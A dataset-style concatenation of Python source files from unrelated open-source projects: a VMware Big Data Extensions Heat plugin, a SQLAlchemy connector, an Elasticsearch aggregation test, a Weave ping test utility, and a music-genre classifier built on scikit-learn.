logger.info(_("VirtualElephant::VMware::BDE - Sleeping for %s seconds BDE to create nodes") % sleep)
time.sleep(sleep)
# Create ports for the BDE nodes on the NSX logical router
nsx = self._create_nsx_ports()
term = self._close_connection()
return
def handle_suspend(self):
# REST API call to shutdown an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
state = 'stop'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name + '?state=' + state
url = prefix + bde_server + port + api_call
r = curr.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Stop cluster status code %s") % r.json)
term = self._close_connection()
return
def handle_resume(self):
# REST API call to startup an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
state = 'start'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name + '?state=' + state
url = prefix + bde_server + port + api_call
r = curr.post(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Start cluster status code %s") % r.json)
term = self._close_connection()
return
def handle_delete(self):
# REST API call to delete an existing VMware BDE cluster
bde_server = self.properties.get(self.BDE_ENDPOINT)
bde_user = self.properties.get(self.USERNAME)
bde_pass = self.properties.get(self.PASSWORD)
name = self.properties.get(self.CLUSTER_NAME)
prefix = 'https://'
port = ':8443'
curr = self._open_connection()
header = {'content-type': 'application/json'}
api_call = '/serengeti/api/cluster/' + name
url = prefix + bde_server + port + api_call
r = curr.delete(url, headers=header, verify=False)
logger.info(_("VirtualElephant::VMware::BDE - Delete cluster status code %s") % r.json)
# Need to delete the NSX ports for clean-up
term = self._close_connection()
return
def resource_mapping():
return { 'VirtualElephant::VMware::BDE': BigDataExtensions }
| virtualelephant/openstack-heat-bde-plugin | plugin/BigDataExtensions.py | Python | apache-2.0 | 17,510 |
# -*- coding: utf-8 -*-
#
# Copyright 2012 Institut für Experimentelle Kernphysik - Karlsruher Institut für Technologie
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import *
import hf
metadata = MetaData()
engine = None
def connect(implicit_execution=False):
config = dict(hf.config.items("database"))
hf.database.engine = engine_from_config(config, prefix="")
if implicit_execution:
metadata.bind = hf.database.engine
def disconnect():
pass
| HappyFaceMonitoring/HappyFace | hf/database.py | Python | apache-2.0 | 1,009 |
from pylastica.query import Query
from pylastica.aggregation.min import Min
from pylastica.aggregation.nested import Nested
from pylastica.doc_type.mapping import Mapping
from pylastica.document import Document
from tests.base import Base
__author__ = 'Joe Linn'
import unittest
class NestedTest(unittest.TestCase, Base):
def setUp(self):
super(NestedTest, self).setUp()
self._index = self._create_index("test_aggregation_nested")
mapping = Mapping()
mapping.set_properties({
"resellers": {
"type": "nested",
"properties": {
"name": {"type": "string"},
"price": {"type": "double"}
}
}
})
doc_type = self._index.get_doc_type("test")
doc_type.mapping = mapping
docs = [
Document(1, {
"resellers": {
"name": "spacely sprockets",
"price": 5.55
}
}),
Document(2, {
"resellers": {
"name": "cogswell cogs",
"price": 4.98
}
})
]
doc_type.add_documents(docs)
self._index.refresh()
def tearDown(self):
super(NestedTest, self).tearDown()
self._index.delete()
def test_nested_aggregation(self):
agg = Nested("resellers", "resellers")
agg.add_aggregation(Min("min_price").set_field("price"))
query = Query()
query.add_aggregation(agg)
results = self._index.search(query).aggregations['resellers']
self.assertEqual(4.98, results['min_price']['value'])
if __name__ == '__main__':
unittest.main()
| jlinn/pylastica | tests/aggregation/test_nested.py | Python | apache-2.0 | 1,762 |
#!/usr/bin/env python3
#
# Copyright (c) 2015-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# A Happy command line utility that tests Weave Ping among Weave nodes.
#
# The command is executed by instantiating and running WeavePing class.
#
from __future__ import absolute_import
from __future__ import print_function
import getopt
import sys
import set_test_path
from happy.Utils import *
import WeavePing
if __name__ == "__main__":
options = WeavePing.option()
try:
opts, args = getopt.getopt(sys.argv[1:], "ho:s:c:tuwqp:i:a:e:n:CE:T:",
["help", "origin=", "server=", "count=", "tcp", "udp", "wrmp", "interval=", "quiet",
"tap=", "case", "case_cert_path=", "case_key_path="])
except getopt.GetoptError as err:
print(WeavePing.WeavePing.__doc__)
print(hred(str(err)))
sys.exit(hred("%s: Failed server parse arguments." % (__file__)))
for o, a in opts:
if o in ("-h", "--help"):
print(WeavePing.WeavePing.__doc__)
sys.exit(0)
elif o in ("-q", "--quiet"):
options["quiet"] = True
elif o in ("-t", "--tcp"):
options["tcp"] = True
elif o in ("-u", "--udp"):
options["udp"] = True
elif o in ("-w", "--wrmp"):
options["wrmp"] = True
elif o in ("-o", "--origin"):
options["client"] = a
elif o in ("-s", "--server"):
options["server"] = a
elif o in ("-c", "--count"):
options["count"] = a
elif o in ("-i", "--interval"):
options["interval"] = a
elif o in ("-p", "--tap"):
options["tap"] = a
elif o in ("-C", "--case"):
options["case"] = True
elif o in ("-E", "--case_cert_path"):
options["case_cert_path"] = a
elif o in ("-T", "--case_key_path"):
options["case_key_path"] = a
else:
assert False, "unhandled option"
if len(args) == 1:
options["origin"] = args[0]
if len(args) == 2:
options["client"] = args[0]
options["server"] = args[1]
cmd = WeavePing.WeavePing(options)
cmd.start()
| openweave/openweave-core | src/test-apps/happy/bin/weave-ping.py | Python | apache-2.0 | 2,876 |
from sklearn.model_selection import StratifiedKFold
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier
from sklearn.metrics import confusion_matrix
from tools import ConfusionMatrixUtils
import pydotplus
import numpy as np
import matplotlib.pyplot as plt
import itertools
import os
import joblib
import librosa
import logging
from featuresExtraction import extractFeatures
try:
from xgboost import XGBClassifier
except ImportError:
print("xgboost not installed!")
# Returns the best classifiers for faster experiments
def bestClfs():
'''
This method return a list of the best classifiers used in the beatsdataset.csv
:return list: List of classifiers
'''
DTC23 = tree.DecisionTreeClassifier(class_weight=None, criterion='gini', max_depth=None,
max_features=None, max_leaf_nodes=None,
min_impurity_split=1e-07, min_samples_leaf=15,
min_samples_split=61, min_weight_fraction_leaf=0,
presort=False, random_state=None, splitter='best')
# ----> Accuracy: 0.553043478261 +- 0.0141287624428
RFC23 = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',
max_depth=None, max_features=0.497907908371,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=2, min_samples_split=2,
min_weight_fraction_leaf=0, n_estimators=150, n_jobs=4,
oob_score=True, random_state=None, verbose=0, warm_start=False)
DTC7 = tree.DecisionTreeClassifier(class_weight=None, criterion='gini', max_depth=None,
max_features=None, max_leaf_nodes=None,
min_impurity_split=1e-07, min_samples_leaf=9,
min_samples_split=40, min_weight_fraction_leaf=0,
presort=False, random_state=None, splitter='best')
# ----> Accuracy: 0.553043478261 +- 0.0141287624428
RFC7 = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',
max_depth=None, max_features=0.59,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=2, min_samples_split=15,
min_weight_fraction_leaf=0, n_estimators=84, n_jobs=4,
oob_score=True, random_state=None, verbose=0, warm_start=False)
ET7 = ExtraTreesClassifier(bootstrap=False, class_weight=None, criterion='gini',
max_depth=None, max_features=0.790926623187,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=1, min_samples_split=16,
min_weight_fraction_leaf=0, n_estimators=135, n_jobs=4,
oob_score=False, random_state=None, verbose=0, warm_start=False)
GB7 = GradientBoostingClassifier(criterion='friedman_mse', init=None,
learning_rate=0.0150834277809, loss='deviance',
max_depth=None, max_features=0.982060609531,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=22, min_samples_split=51,
min_weight_fraction_leaf=0, n_estimators=135, presort='auto',
random_state=None, subsample=0.769360696352, verbose=0,
warm_start=False)
#1 0.548 +-0.015 with beatsdataset.csv (windows and steps 1 1 0.05 0.05) SIN ESSENTIA BPM 0.47
#2 0.492 +- 0.015 with beatsdataset1-1-01-005.csv
#3 0.486 +- 0.015 with beatsdataset1-1-01-01.csv
#4 0.424 +- 0.023 with beatsdataset1-1-04-04.csv
#5 0.4383 +- 0.0103 with beatsdataset1-05-005-0025.csv
#6 0.463 +- 0.032 with beatsdataset138-stStep25.csv
#7 0.493 +- 0.011 with beatsdataset138-stStep50.csv CON ESSENTIA BPM 0.56 +- 0.007
#10 0.694 +- 0.044 with gtzan.csv
#ETC = ExtraTreesClassifier(bootstrap=True, criterion="gini",max_features=1, min_samples_leaf=2,min_samples_split=10, n_estimators=100)
# Accuracy 138 step 50 with BPM essentia (0.56260869565217386, 0.012251306785743798)
#ETC = ExtraTreesClassifier(bootstrap=False, criterion="gini",max_features=0.5, min_samples_leaf=2,min_samples_split=10, n_estimators=100)
# Best with GTZAN
#1 0.534 +- 0.01 with beatsdataset.csv
#2 0.46 +- 0.01 with beatsdataset1-1-01-005.csv
#3 0.48 +- 0.014 with beatsdataset1-1-01-01.csv
#4 0.422 +- 0.019 with beatsdataset1-1-04-04.csv
#5 0.4387 +- 0.0182 with beatsdataset1-05-005-0025.csv
#6 0.452 +- 0.0198 with beatsdataset138-stStep25.csv
#7 0.486 +- 0.024 with beatsdataset138-stStep50.csv
#10 0.731 +- 0.021 with gtzan.csv
#GBC = GradientBoostingClassifier(learning_rate=0.1, max_depth=6,max_features=0.5, min_samples_leaf=13,min_samples_split=6, subsample=0.8)
#1 0.556 +-0.016 with beatsdataset.csv SIN ESSENTIA BPM 0.48
#2 0.477 +- 0.012 with beatsdataset1-1-01-005.csv
#3 0.477 +- 0.007 with beatsdataset1-1-01-01.csv
#4 0.451 +- 0.007 with beatsdataset1-1-04-04.csv
#5 0.443 +- 0.019 with beatsdataset1-05-005-0025.csv
#6 0.479 +- 0.011 with beatsdataset138-stStep25.csv
#7 0.5 +- 0.02 with beatsdataset138-stStep50.csv CON ESSENTIA BPM 0.557, 0.017
#10 0.722 +- 0.012 with gtzan.csv
#XGB = XGBClassifier(learning_rate=0.1, max_depth=5,min_child_weight=6, nthread=4,subsample=0.55)
clfs = [DTC23, RFC23, DTC7, RFC7, ET7, GB7]
return clfs
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
'''
This function plots a confusion matrix
:param numpy.array cm: Confusion matrix
:param list classes: List of classes
:param boolean normalize: True to normalize
:param str title: Title of the plot
:param cmap: Colours
'''
classes = sorted(classes)
plt.imshow(cm, interpolation='nearest', cmap=cmap, vmax=sum(cm[0][:]))
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=90, fontsize=12)
plt.yticks(tick_marks, classes, fontsize=12)
if normalize:
cm = np.round(100*cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]).astype('int')
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
verticalalignment="center",
color="white" if cm[i, j] > thresh else "black",
fontsize=16)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
def KFoldCrossValidation(df, report_folder, clf, random_state=None):
'''
Generates a report using KFold cross validation.
It generate train/test confusion matrix for each kfold, a final kfold with all the test splits
and a report.txt with metrics and other data.
:param pandas.DataFrame df: DataFrame with the dataset
:param str report_folder: folder where save pics and report
:param clf: classifier with methods fit, score and predict sklearn styled
:return: clf trained with all the data
'''
class_list, features, labels = unpackDF(df)
# Create object to split the dataset (in 5 at random but preserving percentage of each class)
skf = StratifiedKFold(n_splits=10, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Report file with useful information
if (os.path.isdir(report_folder)):
logging.warning("The directory %s already exist", report_folder)
else:
logging.info("Creating directory %s", report_folder)
os.mkdir(report_folder, 0o0755)
report = open(os.path.join(report_folder,"report.txt"), "w")
codes = []
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
# Train the classifier with 80% of samples
clf.fit(features_train, labels_train)
# And predict with the other 20%
accuracies_kfold.append(clf.score(features_test, labels_test))
# Labels predicted for test split
labels_pred_test = clf.predict(features_test)
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
codes.extend(features_test[:,71])
kcounter += 1
print(accuracies_kfold)
print("\nMean accuracy: " + str(np.mean(accuracies_kfold)) + " +- " + str(np.std(accuracies_kfold)) + "\n")
report.write("Accuracies: " + str(accuracies_kfold) + "\nMean accuracy: " + str(np.mean(accuracies_kfold)) + " +- " + str(
np.std(accuracies_kfold)) + "\n")
# Confusion matrix with all the predicted classes
cm_kfold_total = confusion_matrix(labels_kfold, labels_kfold_predicted)
# Get current size and making it bigger
fig_size = plt.rcParams["figure.figsize"]
# Set figure according with the number of classes
size = len(class_list) - len(class_list)*30/100
fig_size[0] = size
fig_size[1] = size
plt.rcParams["figure.figsize"] = fig_size
plt.figure()
plot_confusion_matrix(cm_kfold_total, class_list, False, "Full test Confusion")
plt.savefig(os.path.join(report_folder,"cmkfolds.pdf"))
cmm = ConfusionMatrixUtils(cm_kfold_total, class_list)
report.write(cmm.report() + "\n\n")
joblib.dump(cmm,os.path.join(report_folder,"cmm"))
joblib.dump(cmm.cmmToGraph(),os.path.join(report_folder,"cmgraph"))
clf.fit(features, labels)
return clf, labels_kfold_predicted, codes
def TreeKFoldReport(df, report_folder, clf, n_splits=10, random_state=None):
'''
Uses KFold cross validation over the dataset generating info in the report folder.
:param df: pandas.DataFrame with the dataset
:param report_folder: folder to save pics and report
:param clf: DecissionTreeClassifier
:param int n_splits: Number of kfolds
:param float random:state: Random state seed
:return: clf full trained with the whole dataset
'''
class_list, features, labels = unpackDF(df)
# Feature names list
features_names_full = list(df.columns.values[:-1])
# Create object to split the dataset (in 5 at random but preserving percentage of each class)
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Report file with useful information
report = open(os.path.join(report_folder, "report.txt"), "w")
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
report.write("KFold numero " + str(kcounter) + "\n")
print("Train:", train_index, "Test:", test_index)
report.write("\tTrain: " + str(train_index) + " Test:" + str(test_index) + "\n\n")
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
# Train the classifier
clf.fit(features_train, labels_train)
accuracies_kfold.append(clf.score(features_test, labels_test))
print(accuracies_kfold[kcounter])
report.write("\tAccuracy: " + str(accuracies_kfold[kcounter]) + "\n")
# Confusion matrix for train and test
labels_pred_test = clf.predict(features_test)
labels_pred_train = clf.predict(features_train)
cm_test = confusion_matrix(labels_test, labels_pred_test)
cm_train = confusion_matrix(labels_train, labels_pred_train)
cmm = ConfusionMatrixUtils(cm_test, class_list)
report.write("\t" + cmm.report() + "\n\n")
"""
Ploting the test confusion for the test set
"""
# Get current size and making it bigger
fig_size = plt.rcParams["figure.figsize"]
# Set figure according with the number of classes
size = len(class_list) - len(class_list) * 30 / 100
fig_size[0] = size
fig_size[1] = size
plt.rcParams["figure.figsize"] = fig_size
plt.figure()
plot_confusion_matrix(cm_test, class_list, False, "Test Confusion")
plt.savefig(os.path.join(report_folder,"cmtest" + str(kcounter) + ".pdf"))
"""
Ploting the train confusion for the train set"""
plt.figure()
plot_confusion_matrix(cm_train, class_list, False, "Train Confusion")
plt.savefig(os.path.join(report_folder,"cmtrain" + str(kcounter) + ".pdf"))
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
kcounter += 1
print(accuracies_kfold)
print("\nMean accuracy: " + str(np.mean(accuracies_kfold)) + "+-" + str(np.std(accuracies_kfold)) + "\n")
report.write(
"Accuracies: " + str(accuracies_kfold) + "\nMean accuracy: " + str(np.mean(accuracies_kfold)) + "+-" + str(
np.std(accuracies_kfold)) + "\n")
cm_kfold_total = confusion_matrix(labels_kfold, labels_kfold_predicted)
plt.figure()
plot_confusion_matrix(cm_kfold_total, class_list, False, "Full test Confusion")
plt.savefig(os.path.join(report_folder,"cmkfolds.pdf"))
cmm = ConfusionMatrixUtils(cm_kfold_total, class_list)
report.write(cmm.report() + "\n\n")
clf.fit(features, labels)
dot_data = tree.export_graphviz(clf, out_file=None,
feature_names=features_names_full,
class_names=class_list,
filled=True, rounded=True,
special_characters=True)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf(os.path.join(report_folder,"FinalTree.pdf"))
return clf
def plot_feature_importances(tree_classifier, feat_names, nfeat=10, dimy=6, dimx=8,):
'''
Plots the nfeat more important features of the tree or random forest given.
:param tree_classifier: classifier DecissionTree or RandomForest
:param feat_names: The name of the features in the tree
:param nfeat: The number of top features to show
:param dimx: fig size x
:param dimy: fig size y
'''
importances = tree_classifier.feature_importances_
std = np.std([importances], axis=0) #Does nothing
indices = importances.argsort()[-nfeat:][::-1]
print("Feature ranking:")
for f in range(nfeat):
print("%d. feature %d (%f)" % (f+1, indices[f], importances[indices[f]]))
plt.figure()
fig_size = plt.rcParams["figure.figsize"]
fig_size[0] = dimx
fig_size[1] = dimy
plt.rc('ytick', labelsize=16)
plt.rcParams["figure.figsize"] = fig_size
plt.title("Feature importances")
plt.bar(range(nfeat), importances[indices],
color="b", yerr=std[indices], align="center")
plt.xticks(range(nfeat), feat_names[indices], rotation=75, fontsize=12)
plt.xlim([-1, nfeat])
plt.show()
def unpackDF(df):
'''
Extract classes, features, and labels from a pandas.DataFrame.
One column of the DataFrame should be called "class" and
the rest are features.
:param DataFrame df: pandas.DataFrame with the dataset
:return: Classes, features, labels
'''
# List with the different labels
class_list = list(df["class"].drop_duplicates())
# List with all the labels (X)
labels = list(df["class"].values)
# List with the features (y)
df = df.drop(["class"],axis=1).reset_index(drop=True)
features = []
for j in range(df.shape[0]):
item = df.ix[j]
features.append([item[i] for i in range(len(item))])
return class_list, features, labels
def KFoldAccuracy(df, clf, n_splits=10, random_state=None):
'''
Computes KFold cross validation accuracy using n_splits folds over the data in the pandas.DataFrame given.
Uses an stratified KFold with the random_state specified.
:param df: pandas.DataFrame where is the data for train/test splits
:param clf: classifier with methods fit, predict and score
:param n_splits: number of splits
:param random_state: random state seed
:return: mean accuracy, std
'''
_, features, labels = unpackDF(df)
# Create object to split the dataset (in 5 at random but preserving percentage of each class)
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
# Train the classifier
clf.fit(features_train, labels_train)
accuracies_kfold.append(clf.score(features_test, labels_test))
# Labels predicted for test split
labels_pred_test = clf.predict(features_test)
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
kcounter += 1
meanAccuracy = np.mean(accuracies_kfold)
std = np.std(accuracies_kfold)
return meanAccuracy, std
def predictGenre(song_file_name, clf_pkl=os.path.join(os.path.dirname(__file__),'Examples','beats23classifier.pkl')):
'''
Receives an audio file route and a binary classifier and returns the genre of the song in a string
:param str song_file_name: audio file route
:param str clf_pkl: binary classifier route
:return: genre of the song using the classifier given or the default beatport classifier
'''
clf = joblib.load(clf_pkl)
x, Fs = librosa.load(song_file_name)
x = librosa.resample(x, Fs, 22050)
x = librosa.to_mono(x)
feats = extractFeatures(22050, x[:22050 * 120], 1, 1, 0.05, 0.05)
return clf.predict([feats])[0] | Caparrini/pyGenreClf | classifier.py | Python | apache-2.0 | 19,503 |
Subsets and Splits